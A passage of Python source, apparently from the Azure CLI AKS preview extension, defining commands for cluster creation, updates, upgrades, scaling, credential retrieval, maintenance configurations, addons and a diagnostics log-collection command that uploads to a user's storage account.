raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
_re_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/snapshots/(.*)',
flags=re.IGNORECASE)
_re_mc_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/managedclustersnapshots/(.*)',
flags=re.IGNORECASE)
def _get_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_nodepool_snapshots_client(
cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError(
"Snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def _get_cluster_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_mc_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_mc_snapshots_client(
cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError(
"Managed cluster snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
from azure.cli.command_modules.acs.custom import _aks_browse
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser,
listen_address,
listen_port,
CUSTOM_MGMT_AKS_PREVIEW,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
# pylint: disable=unused-argument,too-many-locals
def aks_create(cmd,
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
pod_cidrs=None,
service_cidrs=None,
ip_families=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
disable_public_fqdn=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
http_proxy_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
# NOTE: for workload identity flags, we need to know if it's set to True/False or not set (None)
enable_workload_identity=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
edge_zone=None,
enable_secret_rotation=False,
disable_disk_driver=None,
disable_file_driver=None,
disable_snapshot_controller=None,
rotation_poll_interval=None,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
workload_runtime=None,
gpu_instance_profile=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
snapshot_id=None,
cluster_snapshot_id=None,
enable_oidc_issuer=False,
host_group_id=None,
crg_id=None,
message_of_the_day=None,
enable_azure_keyvault_kms=False,
azure_keyvault_kms_key_id=None,
yes=False):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewCreateDecorator
# decorator pattern
aks_create_decorator = AKSPreviewCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc_preview(mc)
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
assign_kubelet_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
# NOTE: for workload identity flags, we need to know if it's set to True/False or not set (None)
enable_workload_identity=None,
disable_workload_identity=None,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
enable_disk_driver=None,
disable_disk_driver=None,
enable_file_driver=None,
disable_file_driver=None,
enable_snapshot_controller=None,
disable_snapshot_controller=None,
disable_local_accounts=False,
enable_local_accounts=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
yes=False,
tags=None,
nodepool_labels=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
enable_oidc_issuer=False,
http_proxy_config=None,
enable_azure_keyvault_kms=False,
azure_keyvault_kms_key_id=None):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewUpdateDecorator
# decorator pattern
aks_update_decorator = AKSPreviewUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# update mc profile
mc = aks_update_decorator.update_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc_preview(mc)
# pylint: disable=unused-argument
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None,
public_fqdn=False,
credential_format=None):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if credential_format:
credential_format = credential_format.lower()
if admin:
raise InvalidArgumentValueError("--format can only be specified when requesting clusterUser credential.")
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType, credential_format)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name, serverType)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import (is_valid_resource_id, parse_resource_id,
resource_id)
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
# Form containerName from fqdn, as it was previously jsut the location of code is changed.
# https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names
maxContainerNameLength = 63
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_container_name = fqdn.replace('.', '-')
len_of_container_name = normalized_container_name.index("-hcp-")
if len_of_container_name == -1:
len_of_container_name = maxContainerNameLength
container_name = normalized_container_name[:len_of_container_name]
sas_token = sas_token.strip('?')
deployment_yaml = _read_periscope_yaml()
deployment_yaml = deployment_yaml.replace(
"# <accountName, string>", storage_account_name)
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace(
"# <containerName, string>", container_name)
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(container_name)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def _read_periscope_yaml():
curr_dir = os.path.dirname(os.path.realpath(__file__))
periscope_yaml_file = os.path.join(
curr_dir, "deploymentyaml", "aks-periscope.yaml")
yaml_file = open(periscope_yaml_file, "r")
data_loaded = yaml_file.read()
return data_loaded
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster " \
"and might take a while. Do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name, None)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name, snapshot_id=None):
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name, headers=headers)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False,
rotation_poll_interval=None,):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(
workspace_resource_id)
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={
CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
